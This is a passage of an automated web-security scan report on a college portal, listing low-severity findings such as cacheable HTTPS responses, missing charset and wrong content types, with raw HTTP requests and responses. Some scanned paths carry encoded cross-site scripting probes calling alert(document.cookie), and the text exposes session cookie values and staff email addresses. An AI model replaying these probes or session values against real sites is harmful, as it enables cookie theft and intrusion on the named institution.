<br /><b>Results (4)</b>:<br /><div align="center" style="padding-bottom:5px; padding-top:5px; border: 1px dashed rgb(235, 234, 219); margin-bottom:0px;">
Wheeler, Linda<br />Director, Events Center<
...[SNIP]...
<a href="mailto:lwheeler@champlain.edu">lwheeler@champlain.edu</a>
...[SNIP]...
<a href="mailto:jkuzia@champlain.edu">jkuzia@champlain.edu</a>
...[SNIP]...
<a href="mailto:slindberg@champlain.edu">slindberg@champlain.edu</a>
...[SNIP]...
<a href="mailto:mmarcoux@champlain.edu">mmarcoux@champlain.edu</a>
...[SNIP]...

5. Cacheable HTTPS response previous next
There are 7 instances of this issue:

/media/changeaddr.html
/media/new_course_codes-Student.pdf
/scripts/prod/library/dojo/dijit/_editor/nls/commands.js
/scripts/prod/library/dojo/dijit/form/nls/Textarea.js
/scripts/prod/library/dojo/dijit/form/nls/validate.js
/scripts/prod/library/dojo/dijit/nls/common.js
/scripts/prod/library/dojo/dijit/nls/loading.js

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

5.1. https://my.champlain.edu/media/changeaddr.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/media/changeaddr.html

Request

GET /media/changeaddr.html HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.2. https://my.champlain.edu/media/new_course_codes-Student.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/media/new_course_codes-Student.pdf

Request

GET /media/new_course_codes-Student.pdf HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Expires: Tue, 19 Jan 2038 03:14:07 GMT
Last-Modified: Wed, 28 Sep 2011 16:22:05 GMT
Accept-Ranges: bytes
ETag: "ad7924c3fa7dcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 02:00:33 GMT
Connection: close
Content-Length: 107868

%PDF-1.5%....
2020 0 obj<</Linearized 1/L 107868/O 2022/E 53890/N 5/T 107416/H [ 501 216]>>endobj
2038 0 obj<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<1556B656
...[SNIP]...

5.3. https://my.champlain.edu/scripts/prod/library/dojo/dijit/_editor/nls/commands.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/scripts/prod/library/dojo/dijit/_editor/nls/commands.js

Request

GET /scripts/prod/library/dojo/dijit/_editor/nls/commands.js HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Expires: Tue, 19 Jan 2038 03:14:07 GMT
Last-Modified: Wed, 03 Mar 2010 17:42:15 GMT
Accept-Ranges: bytes
ETag: "7d6b4dcf8baca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:51:21 GMT
Content-Length: 1157

({"removeFormat":"Remove Format","copy":"Copy","paste":"Paste","selectAll":"Select All","insertOrderedList":"Numbered List","insertTable":"Insert/Edit Table","underline":"Underline","foreColor":"Foreg
...[SNIP]...

5.4. https://my.champlain.edu/scripts/prod/library/dojo/dijit/form/nls/Textarea.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/scripts/prod/library/dojo/dijit/form/nls/Textarea.js

Request

GET /scripts/prod/library/dojo/dijit/form/nls/Textarea.js HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Expires: Tue, 19 Jan 2038 03:14:07 GMT
Last-Modified: Wed, 03 Mar 2010 17:42:14 GMT
Accept-Ranges: bytes
ETag: "87b412dcf8baca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:51:21 GMT
Content-Length: 70

({"iframeEditTitle":"edit area","iframeFocusTitle":"edit area frame"})

5.5. https://my.champlain.edu/scripts/prod/library/dojo/dijit/form/nls/validate.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/scripts/prod/library/dojo/dijit/form/nls/validate.js

Request

GET /scripts/prod/library/dojo/dijit/form/nls/validate.js HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: https://my.champlain.edu/page_authrequired
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Expires: Tue, 19 Jan 2038 03:14:07 GMT
Last-Modified: Wed, 03 Mar 2010 17:42:14 GMT
Accept-Ranges: bytes
ETag: "477917dcf8baca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:51:46 GMT
Content-Length: 142

({"rangeMessage":"This value is out of range.","invalidMessage":"The value entered is not valid.","missingMessage":"This value is required."})

5.6. https://my.champlain.edu/scripts/prod/library/dojo/dijit/nls/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/scripts/prod/library/dojo/dijit/nls/common.js

Request

GET /scripts/prod/library/dojo/dijit/nls/common.js HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Expires: Tue, 19 Jan 2038 03:14:07 GMT
Last-Modified: Wed, 03 Mar 2010 17:42:14 GMT
Accept-Ranges: bytes
ETag: "a71453dcf8baca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:45:49 GMT
Content-Length: 83

({"buttonOk":"OK","buttonCancel":"Cancel","buttonSave":"Save","itemClose":"Close"})

5.7. https://my.champlain.edu/scripts/prod/library/dojo/dijit/nls/loading.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/scripts/prod/library/dojo/dijit/nls/loading.js

Request

GET /scripts/prod/library/dojo/dijit/nls/loading.js HTTP/1.1
Host: my.champlain.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.champlain.edu/
Cookie: PHPSESSID=d1k3utcleaggm7vui5dc3chko4
Content-Length: 10

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Expires: Tue, 19 Jan 2038 03:14:07 GMT
Last-Modified: Wed, 03 Mar 2010 17:42:14 GMT
Accept-Ranges: bytes
ETag: "279e5cdcf8baca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 25 Dec 2011 21:08:55 GMT
Content-Length: 71

({"loadingState":"Loading...","errorState":"Sorry, an error occurred"})

6. HTML does not specify charset previous next
There are 11 instances of this issue:

/feedback/allwidgets
/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac
/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac
/page_form_misc_bulletinboard/show
/widget_campusdir/departmentlist
/widget_login
/widgets/widget_campusdir/
/widgets/widget_events/
/widgets/widget_resources/
/xhr/dird
/xhr/dirp

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyze the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognized character set, for example charset=ISO-8859-1.

6.1. https://my.champlain.edu/feedback/allwidgets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets

Request

GET /feedback/allwidgets HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:51:15 GMT
Content-Length: 632

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.da
...[SNIP]...

6.2. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f1a2b2b1ac

Request

Response

6.3. https://my.champlain.edu/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/feedback/allwidgets98d24%2527%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e6f1a2b2b1ac

Request

Response

6.4. https://my.champlain.edu/page_form_misc_bulletinboard/show previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/page_form_misc_bulletinboard/show

Request

GET /page_form_misc_bulletinboard/show HTTP/1.1
Host: my.champlain.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://my.champlain.edu/
Cookie: PHPSESSID=d1k3utcleaggm7vui5dc3chko4
Content-Length: 10

Response

6.5. https://my.champlain.edu/widget_campusdir/departmentlist previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/widget_campusdir/departmentlist

Request

GET /widget_campusdir/departmentlist HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:45:45 GMT
Content-Length: 7256

<div style="style="border-top: 1px dashed rgb(235, 234, 219);">
<img src="/imgs/page_element_bulletin_board_bullet.gif"/> <a onclick="departmentLookup('Academic Coaching'); return false;" href="#n
...[SNIP]...

6.6. https://my.champlain.edu/widget_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/widget_login

Request

Response

6.7. https://my.champlain.edu/widgets/widget_campusdir/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/widgets/widget_campusdir/

Request

GET /widgets/widget_campusdir/ HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:45:42 GMT
Content-Length: 4918

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.dash
...[SNIP]...

6.8. https://my.champlain.edu/widgets/widget_events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/widgets/widget_events/

Request

GET /widgets/widget_events/ HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:45:42 GMT
Content-Length: 7204

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.da
...[SNIP]...

6.9. https://my.champlain.edu/widgets/widget_resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/widgets/widget_resources/

Request

GET /widgets/widget_resources/ HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root
Content-Length: 10

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:45:42 GMT
Content-Length: 8025

<div style="display:none;">IE Hack</div>
<div dojoType="dijit.layout.ContentPane">
   <script type="dojo/method">
   var self;
   if (typeof(window.portal) != 'undefined')
       self = window.portal.dash
...[SNIP]...

6.10. https://my.champlain.edu/xhr/dird previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/xhr/dird

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:49:54 GMT
Content-Length: 1314

<br /><b>Results (4)</b>:<br /><div align="center" style="padding-bottom:5px; padding-top:5px; border: 1px dashed rgb(235, 234, 219); margin-bottom:0px;">
Wheeler, Linda<br />Director, Events Center<
...[SNIP]...

6.11. https://my.champlain.edu/xhr/dirp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.champlain.edu
Path:	/xhr/dirp

Request

POST /xhr/dirp HTTP/1.1
Host: my.champlain.edu
Connection: keep-alive
Content-Length: 36
Origin: https://my.champlain.edu
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://my.champlain.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4d7d8kkrde4u52l2mku6s2ma91; SaveStateCookie=root

name=pellitier&department=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:49:48 GMT
Content-Length: 39

<br /><br /><b>Invalid input.<b></br />

7. Content type incorrectly stated previous
There are 2 instances of this issue:

/xhr/dird
/xhr/dirp

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyze the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

7.1. https://my.champlain.edu/xhr/dird previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/xhr/dird

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /xhr/dird HTTP/1.1
Host: my.champlain.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.2. https://my.champlain.edu/xhr/dirp previous

Summary

Severity:	Information
Confidence:	Firm
Host:	https://my.champlain.edu
Path:	/xhr/dirp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.12
X-Powered-By: ASP.NET
Date: Mon, 26 Dec 2011 01:49:48 GMT
Content-Length: 39

<br /><br /><b>Invalid input.<b></br />

Report generated by HTI at Sat Sep 01 09:25:33 EDT 2012.